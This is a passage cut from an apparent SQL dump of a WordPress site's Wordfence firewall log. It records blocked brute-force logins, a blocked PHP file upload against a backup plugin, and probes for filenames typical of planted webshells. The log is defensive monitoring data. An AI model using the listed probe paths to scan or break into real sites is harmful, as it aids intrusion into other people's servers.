Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14307,0.000000,1704552226.661872,'&S\01\0\0\0\0\0\0\0&',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14365,0.000000,1704600998.404307,'\0\0\0\0\0\0\0\0\0\0gy\Z',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14366,0.000000,1704601179.154207,'\0\0\0\0\0\0\0\0\0\0S#@',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14176,1704490305.835952,1704490305.756900,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/class.api.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NsYXNzLmFwaS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14362,0.000000,1704599202.305454,'*H\04\0\0\0\0\0\0\0',0,200,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','loginFailInvalidUsername',NULL,NULL),(14363,0.000000,1704599466.569806,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14364,0.000000,1704599560.210173,'\0\0\0\0\0\0\0\0\0\03k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14177,1704490303.533967,1704490303.435400,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/class_api.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NsYXNzX2FwaS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14361,0.000000,1704597948.570037,'\0\0\0\0\0\0\0\0\0\0z\"',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14327,1704572266.129410,1704572266.044800,'\0\0\0\0\0\0\0\0\0\0bF9<',0,403,0,0,0,'https://tummyrevolution.com/auto_seo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F1dG9fc2VvLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14178,1704490291.975537,1704490291.919600,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/wp-admin/js/widgets/class.api.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2pzL3dpZGdldHMvY2xhc3MuYXBpLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14360,0.000000,1704597940.603365,'\0\0\0\0\0\0\0\0\0\0Ո]',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14359,0.000000,1704596460.282575,'\0\0\0\0\0\0\0\0\0\0pW',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14179,1704490290.433423,1704490290.370000,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/wp-admin/images/class.api.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2ltYWdlcy9jbGFzcy5hcGkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14357,0.000000,1704594995.439925,'\0\0\0\0\0\0\0\0\0\0\0@',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14358,0.000000,1704596322.178183,'\0\0\0\0\0\0\0\0\0\0\"KA',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14356,0.000000,1704594700.393610,'\0\0\0\0\0\0\0\0\0\0c[',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14180,1704490284.918574,1704490284.838000,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/cgi-bin/class_api.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NnaS1iaW4vY2xhc3NfYXBpLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14354,0.000000,1704591445.067501,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14355,0.000000,1704593337.680558,'\0\0\0\0\0\0\0\0\0\0٪',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14328,1704572336.902617,1704572336.806700,'\0\0\0\0\0\0\0\0\0\0bF9<',0,403,0,0,0,'https://tummyrevolution.com/wp-include/inputs.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGUvaW5wdXRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14181,1704490217.281986,1704490217.149100,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/zero.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3plcm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14182,1704490214.866164,1704490214.770900,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/classwithtostring.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NsYXNzd2l0aHRvc3RyaW5nLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14352,0.000000,1704589822.730751,'\0\0\0\0\0\0\0\0\0\0\\̊',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14353,0.000000,1704591445.168757,'\0\0\0\0\0\0\0\0\0\0H',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14351,0.000000,1704588208.424691,'\0\0\0\0\0\0\0\0\0\02tf',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14183,1704490209.195985,1704490209.113800,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/simple.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14340,0.000000,1704577168.140449,'\0\0\0\0\0\0\0\0\0\0B',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14339,0.000000,1704577027.522174,' A9\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14350,0.000000,1704587645.834390,'\0\0\0\0\0\0\0\0\0\03q',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14341,0.000000,1704578621.367825,'\0\0\0\0\0\0\0\0\0\0\\9',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14184,1704490202.308450,1704490202.220200,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/fox.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ZveC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14342,0.000000,1704580214.389901,'\0\0\0\0\0\0\0\0\0\0[z',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14329,1704572321.890444,1704572321.775800,'\0\0\0\0\0\0\0\0\0\0bF9<',0,403,0,0,0,'https://tummyrevolution.com/wp-include/auto_seo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGUvYXV0b19zZW8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14185,1704490200.334187,1704490200.266600,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/component-init.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbXBvbmVudC1pbml0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14186,1704490194.762697,1704490194.654800,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/woh.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvaC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(14338,1704576598.540693,1704576598.435000,'\0\0\0\0\0\0\0\0\0\0[\\:',0,403,0,0,0,'https://tummyrevolution.com/style.php?sig=rename',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14343,0.000000,1704580923.716317,'\0\0\0\0\0\0\0\0\0\0-=',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14187,1704490497.032671,1704490496.926300,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/wp-content/themes/wp-pridmag/up.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3dwLXByaWRtYWcvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14344,0.000000,1704581395.401920,'\0\0\0\0\0\0\0\0\0\0b8',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4','loginFailValidUsername',NULL,NULL),(14188,1704490478.096645,1704490478.004200,' D\0A0ȳ',0,403,0,0,0,'https://www.tummyrevolution.com/wp-content/themes/tflow/up.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3RmbG93L3VwLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14190,0.000000,1704491116.667262,'\0\0\0\0\0\0\0\0\0\0}',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14191,1704491405.432714,1704491404.774000,'\0\0\0\0\0\0\0\0\0\09',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/2797806595...php','https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/2797806595...php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36','blocked:waf','Malicious File Upload (PHP)','{\"learningMode\":0,\"failedRules\":\"76\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzLzI3OTc4MDY1OTUuLi5waHA=\",\"category\":\"file_upload\",\"ssl\":1}'),(14189,0.000000,1704490925.675745,'\0\0\0\0\0\0\0\0\0\0Y{i',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:46.0) Gecko/20100101 Firefox/46.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14249,0.000000,1704519338.175271,'*\0\0\0\0\0\0/p',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14250,0.000000,1704519548.299472,'\0\0\0\0\0\0\0\0\0\0k',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0','loginFailValidUsername',NULL,NULL),(14251,0.000000,1704519933.807406,'\0\0\0\0\0\0\0\0\0\0C',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14252,0.000000,1704520966.598813,'\0\0\0\0\0\0\0\0\0\0+?',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14248,0.000000,1704517707.117861,'\0\0\0\0\0\0\0\0\0\0-wR4',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14253,1704521715.257870,1704521715.151300,'\0\0\0\0\0\0\0\0\0\0^@x',0,403,0,0,0,'https://tummyrevolution.com/wp-content/cache/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) 